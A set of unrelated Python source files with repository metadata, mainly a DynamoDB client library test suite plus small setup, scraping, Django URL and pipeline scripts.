from dynamo3.result import (add_dicts, Count, Capacity, ConsumedCapacity,
ResultSet)
try:
import unittest2 as unittest # pylint: disable=F0401
except ImportError:
import unittest
if six.PY3:
unittest.TestCase.assertItemsEqual = unittest.TestCase.assertCountEqual
def is_number(value):
""" Check if a value is a float or int """
return isinstance(value, float) or isinstance(value, six.integer_types)
class BaseSystemTest(unittest.TestCase):
""" Base class for system tests """
dynamo = None
def setUp(self):
super(BaseSystemTest, self).setUp()
# Clear out any pre-existing tables
for tablename in self.dynamo.list_tables():
self.dynamo.delete_table(tablename)
def tearDown(self):
super(BaseSystemTest, self).tearDown()
for tablename in self.dynamo.list_tables():
self.dynamo.delete_table(tablename)
self.dynamo.clear_hooks()
class TestMisc(BaseSystemTest):
""" Tests that don't fit anywhere else """
def tearDown(self):
super(TestMisc, self).tearDown()
self.dynamo.default_return_capacity = False
def test_connection_host(self):
""" Connection can access host of endpoint """
urlparse(self.dynamo.host)
def test_connection_region(self):
""" Connection can access name of connected region """
self.assertTrue(isinstance(self.dynamo.region, six.string_types))
def test_connect_to_region_old(self):
""" Can connect to a dynamo region """
conn = DynamoDBConnection.connect_to_region('us-west-1')
self.assertIsNotNone(conn.host)
def test_connect_to_region_creds_old(self):
""" Can connect to a dynamo region with credentials """
conn = DynamoDBConnection.connect_to_region(
'us-west-1', access_key='abc', secret_key='12345')
self.assertIsNotNone(conn.host)
def test_connect_to_host_without_session_old(self):
""" Can connect to a dynamo host without passing in a session """
conn = DynamoDBConnection.connect_to_host(access_key='abc',
secret_key='12345')
self.assertIsNotNone(conn.host)
def test_connect_to_region(self):
""" Can connect to a dynamo region """
conn = DynamoDBConnection.connect('us-west-1')
self.assertIsNotNone(conn.host)
def test_connect_to_region_creds(self):
""" Can connect to a dynamo region with credentials """
conn = DynamoDBConnection.connect(
'us-west-1', access_key='abc', secret_key='12345')
self.assertIsNotNone(conn.host)
def test_connect_to_host_without_session(self):
""" Can connect to a dynamo host without passing in a session """
conn = DynamoDBConnection.connect('us-west-1', host='localhost')
self.assertIsNotNone(conn.host)
@patch('dynamo3.connection.time')
def test_retry_on_throughput_error(self, time):
""" Throughput exceptions trigger a retry of the request """
def call(*_, **__):
""" Dummy service call """
response = {
'ResponseMetadata': {
'HTTPStatusCode': 400,
},
'Error': {
'Code': 'ProvisionedThroughputExceededException',
'Message': 'Does not matter',
}
}
raise ClientError(response, 'list_tables')
with patch.object(self.dynamo, 'client') as client:
client.list_tables.side_effect = call
with self.assertRaises(ThroughputException):
self.dynamo.call('list_tables')
self.assertEqual(len(time.sleep.mock_calls),
self.dynamo.request_retries - 1)
self.assertTrue(time.sleep.called)
def test_describe_missing(self):
""" Describing a missing table returns None """
ret = self.dynamo.describe_table('foobar')
self.assertIsNone(ret)
def test_magic_table_props(self):
""" Table magically looks up properties on response object """
hash_key = DynamoKey('id')
self.dynamo.create_table('foobar', hash_key=hash_key)
ret = self.dynamo.describe_table('foobar')
self.assertIsNotNone(ret.item_count)
with self.assertRaises(AttributeError):
self.assertIsNotNone(ret.crazy_property)
def test_magic_index_props(self):
""" Index magically looks up properties on response object """
index = GlobalIndex.all('idx-name', DynamoKey('id'))
index.response = {
'FooBar': 2
}
self.assertEqual(index.foo_bar, 2)
with self.assertRaises(AttributeError):
self.assertIsNotNone(index.crazy_property)
def test_describe_during_delete(self):
""" Describing a table during a delete operation should not crash """
response = {
'ItemCount': 0,
'ProvisionedThroughput': {
'NumberOfDecreasesToday': 0,
'ReadCapacityUnits': 5,
'WriteCapacityUnits': 5
},
'TableName': 'myTableName',
'TableSizeBytes': 0,
'TableStatus': 'DELETING'
}
table = Table.from_response(response)
self.assertEqual(table.status, 'DELETING')
def test_delete_missing(self):
""" Deleting a missing table returns False """
ret = self.dynamo.delete_table('foobar')
self.assertTrue(not ret)
def test_re_raise(self):
""" DynamoDBError can re-raise itself if missing exc_info """
err = DynamoDBError(400, Code='ErrCode', Message='Ouch', args={})
try:
err.re_raise()
self.assertTrue(False)
except DynamoDBError as e:
self.assertEqual(err, e)
def test_default_return_capacity(self):
""" When default_return_capacity=True, always return capacity """
self.dynamo.default_return_capacity = True
with patch.object(self.dynamo, 'call') as call:
call().get.return_value = None
rs = self.dynamo.scan('foobar')
list(rs)
call.assert_called_with('scan', TableName='foobar',
ReturnConsumedCapacity='INDEXES')
def test_list_tables_page(self):
""" Call to ListTables should page results """
hash_key = DynamoKey('id')
for i in range(120):
self.dynamo.create_table('table%d' % i, hash_key=hash_key)
tables = list(self.dynamo.list_tables(110))
self.assertEqual(len(tables), 110)
def test_limit_complete(self):
""" A limit with item_capacity = 0 is 'complete' """
limit = Limit(item_limit=0)
self.assertTrue(limit.complete)
class TestDataTypes(BaseSystemTest):
""" Tests for Dynamo data types """
def make_table(self):
""" Convenience method for making a table """
hash_key = DynamoKey('id')
self.dynamo.create_table('foobar', hash_key=hash_key)
def test_string(self):
""" Store and retrieve a string """
self.make_table()
self.dynamo.put_item('foobar', {'id': 'abc'})
item = list(self.dynamo.scan('foobar'))[0]
self.assertEqual(item['id'], 'abc')
self.assertTrue(isinstance(item['id'], six.text_type))
def test_int(self):
""" Store and retrieve an int """
self.make_table()
self.dynamo.put_item('foobar', {'id': 'a', 'num': 1})
item = list(self.dynamo.scan('foobar'))[0]
self.assertEqual(item['num'], 1)
def test_float(self):
""" Store and retrieve a float """
self.make_table()
self.dynamo.put_item('foobar', {'id': 'a', 'num': 1.1})
item = list(self.dynamo.scan('foobar'))[0]
self.assertAlmostEqual(float(item['num']), 1.1)
def test_decimal(self):
""" Store and retrieve a Decimal """
self.make_table()
self.dynamo.put_item('foobar', {'id': 'a', 'num': Decimal('1.1')})
item = list(self.dynamo.scan('foobar'))[0]
self.assertEqual(item['num'], Decimal('1.1'))
def test_binary(self):
""" Store and retrieve a binary """
self.make_table()
self.dynamo.put_item('foobar', {'id': 'a', 'data': Binary('abc')})
item = list(self.dynamo.scan('foobar'))[0]
self.assertEqual(item['data'].value, b'abc')
def test_binary_bytes(self):
""" Store and retrieve bytes as a binary """
self.make_table()
data = {'a': 1, 'b': 2}
self.dynamo.put_item('foobar', {'id': 'a',
'data': Binary(dumps(data))})
item = list(self.dynamo.scan('foobar'))[0]
self.assertEqual(loads(item['data'].value), data)
def test_string_set(self):
""" Store and retrieve a string set """
self.make_table()
item = {
'id': 'a',
'datas': set(['a', 'b']),
}
self.dynamo.put_item('foobar', item)
ret = list(self.dynamo.scan('foobar'))[0]
self.assertEqual(ret, item)
def test_number_set(self):
""" Store and retrieve a number set """
self.make_table()
item = {
'id': 'a',
'datas': set([1, 2, 3]),
}
self.dynamo.put_item('foobar', item)
ret = list(self.dynamo.scan('foobar'))[0]
self.assertEqual(ret, item)
def test_binary_set(self):
""" Store and retrieve a binary set """
self.make_table()
item = {
'id': 'a',
'datas': set([Binary('a'), Binary('b')]),
}
self.dynamo.put_item('foobar', item)
ret = list(self.dynamo.scan('foobar'))[0]
self.assertEqual(ret, item)
def test_binary_equal(self):
""" Binary should eq other Binaries and also raw bytestrings """
self.assertEqual(Binary('a'), Binary('a'))
self.assertEqual(Binary('a'), b'a')
self.assertFalse(Binary('a') != Binary('a'))
def test_binary_repr(self):
""" Binary repr should wrap the contained value """
self.assertEqual(repr(Binary('a')), 'Binary(%s)' % b'a')
def test_binary_converts_unicode(self):
""" Binary will convert unicode to bytes """
b = Binary('a')
self.assertTrue(isinstance(b.value, six.binary_type))
def test_binary_force_string(self):
""" Binary must wrap a string type """
with self.assertRaises(TypeError):
Binary(2)
def test_bool(self):
""" Store and retrieve a boolean """
self.make_table()
self.dynamo.put_item('foobar', {'id': 'abc', 'b': True})
item = list(self.dynamo.scan('foobar'))[0]
self.assertEqual(item['b'], True)
self.assertTrue(isinstance(item['b'], bool))
def test_list(self):
""" Store and retrieve a list """
self.make_table()
self.dynamo.put_item('foobar', {'id': 'abc', 'l': ['a', 1, False]})
item = list(self.dynamo.scan('foobar'))[0]
self.assertEqual(item['l'], ['a', 1, False])
def test_dict(self):
""" Store and retrieve a dict """
self.make_table()
data = {
'i': 1,
's': 'abc',
'n': None,
'l': ['a', 1, True],
'b': False,
}
self.dynamo.put_item('foobar', {'id': 'abc', 'd': data})
item = list(self.dynamo.scan('foobar'))[0]
self.assertEqual(item['d'], data)
def test_nested_dict(self):
""" Store and retrieve a nested dict """
self.make_table()
data = {
's': 'abc',
'd': {
'i': 42,
},
}
self.dynamo.put_item('foobar', {'id': 'abc', 'd': data})
item = list(self.dynamo.scan('foobar'))[0]
self.assertEqual(item['d'], data)
def test_nested_list(self):
""" Store and retrieve a nested list """
self.make_table()
data = [
1,
[
True,
None,
'abc',
],
]
self.dynamo.put_item('foobar', {'id': 'abc', 'l': data})
item = list(self.dynamo.scan('foobar'))[0]
self.assertEqual(item['l'], data)
def test_unrecognized_type(self):
""" Dynamizer throws error on unrecognized type """
value = {
'ASDF': 'abc',
}
with self.assertRaises(TypeError):
self.dynamo.dynamizer.decode(value)
class TestDynamizer(unittest.TestCase):
""" Tests for the Dynamizer """
def test_register_encoder(self):
""" Can register a custom encoder """
from datetime import datetime
dynamizer = Dynamizer()
dynamizer.register_encoder(datetime, lambda d, v:
(STRING, v.isoformat()))
now = datetime.utcnow()
self.assertEqual(dynamizer.raw_encode(now), (STRING, now.isoformat()))
def test_encoder_missing(self):
""" If no encoder is found, raise ValueError """
from datetime import datetime
dynamizer = Dynamizer()
with self.assertRaises(ValueError):
dynamizer.encode(datetime.utcnow())
class TestResultModels(unittest.TestCase):
""" Tests for the model classes in results.py """
def test_add_dicts_base_case(self):
""" add_dict where one argument is None returns the other """
f = object()
self.assertEqual(add_dicts(f, None), f)
self.assertEqual(add_dicts(None, f), f)
def test_add_dicts(self):
""" Merge two dicts of values together """
a = {
'a': 1,
'b': 2,
}
b = {
'a': 3,
'c': 4,
}
ret = add_dicts(a, b)
self.assertEqual(ret, {
'a': 4,
'b': 2,
'c': 4,
})
def test_count_repr(self):
""" Count repr """
count = Count(0, 0)
self.assertEqual(repr(count), "Count(0)")
def test_count_addition(self):
""" Count addition """
count = Count(4, 2)
self.assertEqual(count + 5, 9)
def test_count_subtraction(self):
""" Count subtraction """
count = Count(4, 2)
self.assertEqual(count - 2, 2)
def test_count_multiplication(self):
""" Count multiplication """
count = Count(4, 2)
self.assertEqual(2 * count, 8)
def test_count_division(self):
""" Count division """
count = Count(4, 2)
self.assertEqual(count / 2, 2)
def test_count_add_none_capacity(self):
""" Count addition with one None consumed_capacity """
cap = Capacity.create_read({'CapacityUnits': 3})
count = Count(4, 2)
count2 = Count(5, 3, cap)
ret = count + count2
self.assertEqual(ret, 9)
self.assertEqual(ret.scanned_count, 5)
self.assertEqual(ret.consumed_capacity, cap)
def test_count_add_capacity(self):
""" Count addition with consumed_capacity """
count = Count(4, 2, Capacity.create_read({'CapacityUnits': 3}))
count2 = Count(5, 3, Capacity.create_read({'CapacityUnits': 2}))
ret = count + count2
self.assertEqual(ret, 9)
self.assertEqual(ret.scanned_count, 5)
self.assertEqual(ret.consumed_capacity.read, 5)
def test_capacity_factories(self):
""" Capacity.create_(read|write) factories """
cap = Capacity.create_read({'CapacityUnits': 3})
self.assertEqual(cap.read, 3)
self.assertEqual(cap.write, 0)
cap = Capacity.create_write({'CapacityUnits': 3})
self.assertEqual(cap.write, 3)
self.assertEqual(cap.read, 0)
def test_capacity_math(self):
""" Capacity addition and equality """
cap = Capacity(2, 4)
s = set([cap])
self.assertIn(Capacity(2, 4), s)
self.assertNotEqual(Capacity(1, 4), cap)
self.assertEqual(Capacity(1, 1) + Capacity(2, 2), Capacity(3, 3))
def test_capacity_format(self):
""" String formatting for Capacity """
c = Capacity(1, 3)
self.assertEqual(str(c), "R:1.0 W:3.0")
c = Capacity(0, 0)
self.assertEqual(str(c), "0")
def test_total_consumed_capacity(self):
""" ConsumedCapacity can parse results with only Total """
response = {
'TableName': 'foobar',
'CapacityUnits': 4,
}
cap = ConsumedCapacity.from_response(response, True)
self.assertEqual(cap.total.read, 4)
self.assertIsNone(cap.table_capacity)
def test_consumed_capacity_equality(self):
""" ConsumedCapacity addition and equality """
cap = ConsumedCapacity('foobar', Capacity(0, 10), Capacity(0, 2), {
'l-index': Capacity(0, 4),
}, {
'g-index': Capacity(0, 3),
})
c2 = ConsumedCapacity('foobar', Capacity(0, 10), Capacity(0, 2), {
'l-index': Capacity(0, 4),
'l-index2': Capacity(0, 7),
})
self.assertNotEqual(cap, c2)
c3 = ConsumedCapacity('foobar', Capacity(0, 10), Capacity(0, 2), {
'l-index': Capacity(0, 4),
}, {
'g-index': Capacity(0, 3),
})
self.assertIn(cap, set([c3]))
combined = cap + c2
self.assertEqual(
cap + c2,
ConsumedCapacity('foobar', Capacity(0, 20), Capacity(0, 4),
{'l-index': Capacity(0, 8), 'l-index2': Capacity(0, 7), },
{'g-index': Capacity(0, 3), }))
self.assertIn(str(Capacity(0, 3)), str(combined))
def test_add_different_tables(self):
""" Cannot add ConsumedCapacity of two different tables """
c1 = ConsumedCapacity('foobar', Capacity(1, 28))
c2 = ConsumedCapacity('boofar', Capacity(3, 0))
with self.assertRaises(TypeError):
c1 += c2
def test_always_continue_query(self):
""" Regression test.
If result has no items but does have LastEvaluatedKey, keep querying.
"""
conn = MagicMock()
conn.dynamizer.decode_keys.side_effect = lambda x: x
items = ['a', 'b']
results = [
{'Items': [], 'LastEvaluatedKey': {'foo': 1, 'bar': 2}},
{'Items': [], 'LastEvaluatedKey': {'foo': 1, 'bar': 2}},
{'Items': items},
]
conn.call.side_effect = lambda *_, **__: results.pop(0)
rs = ResultSet(conn, Limit())
results = list(rs)
self.assertEqual(results, items)
class TestHooks(BaseSystemTest):
""" Tests for connection callback hooks """
def tearDown(self):
super(TestHooks, self).tearDown()
for hooks in six.itervalues(self.dynamo._hooks):
while hooks:
hooks.pop()
def test_precall(self):
""" precall hooks are called before an API call """
hook = MagicMock()
self.dynamo.subscribe('precall', hook)
def throw(**_):
""" Throw an exception to terminate the request """
raise Exception()
with patch.object(self.dynamo, 'client') as client:
client.describe_table.side_effect = throw
with self.assertRaises(Exception):
self.dynamo.describe_table('foobar')
hook.assert_called_with(
self.dynamo, 'describe_table', {
'TableName': 'foobar'})
def test_postcall(self):
""" postcall hooks are called after API call """
hash_key = DynamoKey('id')
self.dynamo.create_table('foobar', hash_key=hash_key)
calls = []
def hook(*args):
""" Log the call into a list """
calls.append(args)
self.dynamo.subscribe('postcall', hook)
self.dynamo.describe_table('foobar')
self.assertEqual(len(calls), 1)
args = calls[0]
self.assertEqual(len(args), 4)
conn, command, kwargs, response = args
self.assertEqual(conn, self.dynamo)
self.assertEqual(command, 'describe_table')
self.assertEqual(kwargs['TableName'], 'foobar')
self.assertEqual(response['Table']['TableName'], 'foobar')
def test_capacity(self):
""" capacity hooks are called whenever response has ConsumedCapacity """
hash_key = DynamoKey('id')
self.dynamo.create_table('foobar', hash_key=hash_key)
hook = MagicMock()
self.dynamo.subscribe('capacity', hook)
with patch.object(self.dynamo, 'client') as client:
client.scan.return_value = {
'Items': [],
'ConsumedCapacity': {
'TableName': 'foobar',
'CapacityUnits': 4,
}
}
rs = self.dynamo.scan('foobar')
list(rs)
cap = ConsumedCapacity('foobar', Capacity(4, 0))
hook.assert_called_with(self.dynamo, 'scan', ANY, ANY, cap)
def test_subscribe(self):
""" Can subscribe and unsubscribe from hooks """
hook = object()
self.dynamo.subscribe('precall', hook)
self.assertEqual(len(self.dynamo._hooks['precall']), 1)
self.dynamo.unsubscribe('precall', hook)
self.assertEqual(len(self.dynamo._hooks['precall']), 0)
|
[
"stevearc@stevearc.com"
] |
stevearc@stevearc.com
|
58bf50dfa1ff9df3fb85f9ea8137e332a7d6b16b
|
913874feee8362473286fd29a2697958d87098c0
|
/testcases/venv/bin/easy_install-3.6
|
6ed6ca7c2fd76d56fa7e9cf006bddac55cf0f8ef
|
[] |
no_license
|
Linestro/transpy
|
2a3d3c011ec746f23bdf5b4c93f1762cc5ac2ae5
|
ea1d93df8dd0c1fa77f0d1cbd34efe719d7a20f9
|
refs/heads/master
| 2020-05-25T00:37:49.305807
| 2019-05-17T19:43:06
| 2019-05-17T19:43:06
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 459
|
6
|
#!/home/hxzhu/Documents/sdh_mono-master/testcases/venv/bin/python
# EASY-INSTALL-ENTRY-SCRIPT: 'setuptools==40.8.0','console_scripts','easy_install-3.6'
__requires__ = 'setuptools==40.8.0'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('setuptools==40.8.0', 'console_scripts', 'easy_install-3.6')()
)
|
[
"hxzhu@umich.edu"
] |
hxzhu@umich.edu
|
9b51264685632fddec2373e3a341f25d8d1d3fc9
|
e00fe1e065b448f6f8c0472ed2b8a39991fa7b1b
|
/Fuzzy_clustering/version2/template/project_run.py
|
4188a8c1f9dfdd2d18eda05f8e884d4dcc2f62af
|
[
"Apache-2.0"
] |
permissive
|
joesider9/forecasting_library
|
1a4ded5b09fc603f91fa1c075e79fc2ed06c08a8
|
db07ff8f0f2693983058d49004f2fc6f8849d197
|
refs/heads/master
| 2023-03-29T12:18:22.261488
| 2021-04-01T08:57:08
| 2021-04-01T08:57:08
| 319,906,316
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,106
|
py
|
from Fuzzy_clustering.version2.project_managers.project_eval_manager import ProjectsEvalManager
from Fuzzy_clustering.version2.project_managers.projects_data_manager import ProjectsDataManager
from Fuzzy_clustering.version2.project_managers.projects_train_manager import ProjectsTrainManager
from Fuzzy_clustering.version2.template.constants import *
from Fuzzy_clustering.version2.template.util_database_timos import write_database
def prepare_data():
static_data = write_database()
project_data_manager = ProjectsDataManager(static_data, is_test=False)
nwp_response = project_data_manager.nwp_extractor()
if nwp_response == DONE:
data_response = project_data_manager.create_datasets()
else:
raise RuntimeError('Something was going wrong with nwp extractor')
if data_response == DONE:
project_data_manager.create_projects_relations()
else:
raise RuntimeError('Something was going wrong with data manager')
if hasattr(project_data_manager, 'data_eval'):
project_data_manager.is_test = True
nwp_response = project_data_manager.nwp_extractor()
if nwp_response == DONE:
nwp_response = project_data_manager.create_datasets()
if nwp_response != DONE:
raise RuntimeError('Something was going wrong with on evaluation dataset creator')
else:
raise RuntimeError('Something was going wrong with nwp extractor on evaluation')
print("Data is prepared, training can start")
def train_project():
static_data = write_database()
project_train_manager = ProjectsTrainManager(static_data)
project_train_manager.fit()
def eval_project():
static_data = write_database()
project_eval_manager = ProjectsEvalManager(static_data)
project_eval_manager.evaluate()
def backup_project():
static_data = write_database()
project_backup_manager = ProjectsTrainManager(static_data)
project_backup_manager.clear_backup_projects()
if __name__ == '__main__':
prepare_data()
train_project()
eval_project()
backup_project()
|
[
"joesider9@gmail.com"
] |
joesider9@gmail.com
|
20821475d51ca2148fae3ad69aa416f7dfa372ce
|
87cb949ba0e4159cf698280f241590442d1ea62b
|
/airflow_pipeline/extract_entities_debug.py
|
607b57a327608e2238f91ebac1d67a81d2d4d50c
|
[] |
no_license
|
ePlusPS/emr-workflow
|
000fea60563be659d4df266b873bea32713c1b9f
|
f894d353f647feb8c1ce30083d91d5e070b7d6c6
|
refs/heads/main
| 2023-08-10T07:48:35.904011
| 2020-08-21T00:32:12
| 2020-08-21T00:32:12
| 233,957,297
| 0
| 3
| null | 2023-07-25T15:11:32
| 2020-01-14T23:37:03
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 111
|
py
|
from create_entity_columns import extract_entities
extract_entities('asdf[B-MEDICATION] asdfasdf[B-FEATURE]')
|
[
"Morgan.Worthington@eplus.com"
] |
Morgan.Worthington@eplus.com
|
044b8d3b432a0465426ab35095611881bb8b52c6
|
3fd76a49e0cb7dedd0113abc9fe25d49c96c7610
|
/demo01.py
|
d6d8258fd3c34de89cf6138bf25e91de3f42e6dd
|
[] |
no_license
|
SnowSuo/python
|
4fd51a970139a1eff0097a03534af40e091f3497
|
bbf6691efdfaacd93d674160dc2cd3a03f3e9f6e
|
refs/heads/master
| 2021-07-02T09:10:50.063051
| 2018-06-19T12:49:31
| 2018-06-19T12:49:31
| 130,447,868
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,053
|
py
|
#-*- coding:utf-8 -*-
'''
=============================
获取豆瓣读书榜单,并将获取数据已json文件格式持久化保存
@copyright:Chinasoft international .ETC
@author:SnowSuo
@date:2018-05-02
'''
#导入模块
import urllib.request
import re
import os
import json
#获取网页地址
url='https://book.douban.com/top250?icn=index-book250-all'
response=urllib.request.urlopen(url)
content=response.read().decode('utf-8')
#拆分所需的字符串,定义正则表达式
regcontent=re.compile(r'<tr class="item">(.*?)</tr>',re.S)
regTitle=re.compile(r'<div class="pl2"><a.*?title="(.*?)">')
regLinks=re.compile(r'<a href="(.*?)".*?>')
regRatings=re.compile(r'<span class="rating_nums">(.*?)</span>')
regprice=re.compile(r'<p class="pl">(.*?)</p>')
lstcontent=regcontent.findall(content)
#创建一个列表对象,存放数据
data=[]
for item in lstcontent:
#去掉多余空格
regExp=re.compile(r'[\s\n]{2,}')
#blockcode=regExp.sub('',item)
#创建一个子弹对象,用于封装存放每一个记录的3个数据
dictbook={}
#获取每一个数据图书名称
lstTitle=regTitle.findall(blockcode)
print(lstTitle)
dictbook['title']=lstTitle
#获取每一本图书连接
lstLink=regLinks.findall(blockcode)
print(lstLink)
dictbook['link']=lstLink
#获取评分
lstRating=regRatings.findall(blockcode)
print(lstRating)
dictbook['rating']=lstRating
#获取书籍作者及价格
lstPrice=regprice.findall(blockcode)
print(lstPrice)
#封装好的字典数据添加到list列表中
data.append(dictbook)
print('='*30)
#设置json文件的存储路径
dataDir=os.path.join(os.getcwd(),'.vscode/模块编程/data')
if not os.path.exists(dataDir):
os.mkdir(dataDir)
#将数据写入json文件
with open(dataDir+os.sep+'bookdata.json','w',encoding='utf-8')as jsonfile:
#使用json中dump快速序列化并写入指定文件
json.dump(data,jsonfile,ensure_ascii=False)
print('>>>>json文件写入完毕')
|
[
"yonggang.suo@hotmail.com"
] |
yonggang.suo@hotmail.com
|
92208027272a6e16363b60e6e399cc6ec08fcbb5
|
f3d757f421497e19f2de0d3be21b9ae381511577
|
/phoneconfirmation/urls.py
|
57e758f3e36f49419e6051dbeed37811f6ed3296
|
[
"MIT"
] |
permissive
|
pinax/pinax-phone-confirmation
|
526ba350a5bbaaa58f229fad224cf9db41f5bcbc
|
102d997db0a7cc00bd862a94987338c25ba24f98
|
refs/heads/master
| 2023-06-22T15:57:32.364754
| 2019-04-11T23:59:58
| 2019-04-11T23:59:58
| 22,494,944
| 12
| 3
|
MIT
| 2019-04-11T23:46:54
| 2014-08-01T04:14:23
|
Python
|
UTF-8
|
Python
| false
| false
| 369
|
py
|
from django.conf.urls import url, patterns
urlpatterns = patterns(
"phoneconfirmation.views",
url(r"^$", "phone_list", name="phone_list"),
url(r"^confirm_phone/(\w+)/$", "confirm_phone", name="phone_confirm"),
url(r"^action/$", "action", name="phone_action"),
url(r"^get-country-for-code/$", "get_country_for_code", name="get_country_for_code")
)
|
[
"paltman@gmail.com"
] |
paltman@gmail.com
|
363ece98f426ed769e0ca2315c020c8c4b8a79e2
|
8a18444ba20243cc0d1318efc2c06fbe3c8fbdba
|
/All_Template_Export/All_Templates_Export.py
|
1a54ddb853f88909850fda054c7c5fd77f2f731f
|
[] |
no_license
|
Aqumik/Zabbix-API
|
9157676b03b62e79a22f6c5161a9063137a0fac2
|
6670d58a871a7dc3f3f9dbfe443eff74cce14af9
|
refs/heads/main
| 2023-02-28T21:45:16.430836
| 2021-01-29T08:20:16
| 2021-01-29T08:20:16
| 334,079,762
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,445
|
py
|
# -*- coding:UTF-8 -*-
# @aqumik 2021-1-29 Python3 导出Zabbix所有模板,虽然xml格式有点难看,但是直接导入到服务器就可使用!!
# 具体参数可以查看注释,SSL直接使用了False
import json
import requests
class Zabbix(object):
def __init__(self,url,header,user,password):
self.url = url
self.header = header
self.id = 0
self.user = user
self.password = password
# def get_auth(self):
# req = json.dumps(
# {
# "jsonrpc": "2.0",
# "method": "user.login",
# "params": {
# "user": "Admin",
# "password": "zabbix"
# },
# "id": 0
# }
# )
# ret = requests.post(url=self.url, data=req, headers=self.header).json()
# ret = ret['result']
# authid = ret
# print(authid)
# 验证模块,提交的json验证都在此处
def json_obj(self,method,auth=True,params={}):
obj = {
"jsonrpc": "2.0",
"method": method,
"params": params,
'auth':auth,
"id":self.id
}
# 需要删除后才能json格式化请求,否则无法删除 auth
if not auth:
del obj["auth"]
obj = json.dumps(obj)
return obj
# 登陆模块
def user_login(self):
data = self.json_obj(method="user.login",auth=False,params={"user":self.user,"password":self.password})
req = requests.post(url=self.url,headers=self.header,data=data,verify=False)
req = req.json()['result']
return req
# 退出模块
def user_logout(self,auth):
# auth = self.user_login()
print('********退出模块,认证id',auth)
data = self.json_obj(method="user.logout",auth=auth,params={})
req = requests.post(url=self.url,headers=self.header,data=data,verify=False)
if req.json()['result'] == True:
print('退出成功')
else:
print('退出失败')
return req.text
# 获取所有模板id
def all_template_get(self,auth=True):
print('all_template_get获取到认证id',auth)
data = self.json_obj(method="template.get",auth=auth,
params={
"output": [
"host",
"templateid"
]
})
req = requests.post(url=self.url,headers=self.header,data=data,verify=False)
print(req.json()['result'])
# self.user_logout(auth=auth)
#返回值是所有模板名字+id的数组
return req.json()['result']
#导出所有模板
def all_template_xml(self,auth):
# auth = self.user_login()
all_template_get = self.all_template_get(auth=auth)
for tempalte in all_template_get:
template_name = tempalte['host']
template_id = str(tempalte['templateid'])
print('*********模板名字:%s, id:%s' % (template_name, template_id))
data = self.json_obj(method="configuration.export",auth=auth,
params={
"options":{
"templates": [
template_id
]
},
"format": "xml"
})
req = requests.post(url=self.url,headers=self.header,data=data,verify=False).json()
req = req['result']
#将得到的xml文件输出
myxml = open(template_name+'.xml',mode='a',encoding='utf-8')
print(req,file=myxml)
myxml.close()
print(req)
print('****************all_template_xml获取到的auth',auth)
if __name__ == '__main__':
url = 'http://192.168.20.180/zabbix/api_jsonrpc.php'
header = {'Content-Type': 'application/json'}
user = 'Admin'
password = 'zabbix'
authid = Zabbix(url,header,user,password).user_login()
print(authid)
Zabbix(url, header,user,password).all_template_xml(authid)
Zabbix(url, header,user,password).user_logout(authid)
|
[
"noreply@github.com"
] |
noreply@github.com
|
4b7ffa1ba61b1b2c13a7c33cbe25688ed235e748
|
673e829dda9583c8dd2ac8d958ba1dc304bffeaf
|
/data/multilingual/Latn.BAX/Mono_16/pdf_to_json_test_Latn.BAX_Mono_16.py
|
419f2ec7b49e7c247dfa03dc2764cd5ebdafafec
|
[
"BSD-3-Clause"
] |
permissive
|
antoinecarme/pdf_to_json_tests
|
58bab9f6ba263531e69f793233ddc4d33b783b7e
|
d57a024fde862e698d916a1178f285883d7a3b2f
|
refs/heads/master
| 2021-01-26T08:41:47.327804
| 2020-02-27T15:54:48
| 2020-02-27T15:54:48
| 243,359,934
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 303
|
py
|
import pdf_to_json as p2j
import json
url = "file:data/multilingual/Latn.BAX/Mono_16/udhr_Latn.BAX_Mono_16.pdf"
lConverter = p2j.pdf_to_json.pdf_to_json_converter()
lConverter.mImageHashOnly = True
lDict = lConverter.convert(url)
print(json.dumps(lDict, indent=4, ensure_ascii=False, sort_keys=True))
|
[
"antoine.carme@laposte.net"
] |
antoine.carme@laposte.net
|
2516a2bd1fa7c23e64c179adee06fce8c112efc9
|
59b55a64d9340ef6ee7544c47b4c0086bf797236
|
/scripts/run_full_image.py
|
360a7b0b18a6b2d73edb97934fac0b73b9300056
|
[] |
no_license
|
Jeronics/fashion-mnist-test-case
|
eda3c70d7b5e5113203d39ec5506acd79356148c
|
0b15855e7222e17345d20ca946b0d86c2d1ae29d
|
refs/heads/master
| 2022-10-06T06:34:11.643639
| 2020-06-03T08:23:58
| 2020-06-03T08:23:58
| 268,487,895
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,183
|
py
|
############################# IMPORTS #############################
import os.path as path
import pickle
import numpy as np
import torch
import torchvision.transforms as transforms
from models.networks import ProductionCNN2
from utils.application_utils import get_label_and_bounding_box, create_image
from utils.config import MEAN_PIXEL, STD_PIXEL, ARTIFACTS_DIR
###################################################################
if __name__ == "__main__":
np.random.seed(1)
image_name = "test_long_image"
pil_image = create_image(image_name)
default_transformation = transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((MEAN_PIXEL,), (STD_PIXEL,))
])
pil_image = default_transformation(pil_image)
pil_image = pil_image.unsqueeze(0)
model_name = 'cnn_3'
# loading
with open(path.join(ARTIFACTS_DIR, model_name + '.pkl'), 'rb') as f:
cvGridSearch = pickle.load(f)
model = ProductionCNN2(state_dict=cvGridSearch.best_model.module_.state_dict()).eval()
print(type(pil_image))
with torch.no_grad():
class_idx, image_with_contour = get_label_and_bounding_box(model, pil_image)
|
[
"jeronicarandell@gmail.com"
] |
jeronicarandell@gmail.com
|
0f0b988db044a90843787fcfa17790f226c36531
|
ce1f8877fa9ff084b75bceec4cc7ddf5b3153b07
|
/clif/testing/python/imported_methods_test.py
|
be75ee040777a7e9a8efe35837f737faf0fc1cda
|
[
"Apache-2.0"
] |
permissive
|
HenriChataing/clif
|
034aba392294ac30e40801815cf4d3172d3d44bd
|
307ac5b7957424706c598876d883936c245e2078
|
refs/heads/master
| 2021-01-23T16:25:19.543400
| 2017-09-01T22:18:03
| 2017-09-01T22:18:03
| null | 0
| 0
| null | null | null | null |
UTF-8
|
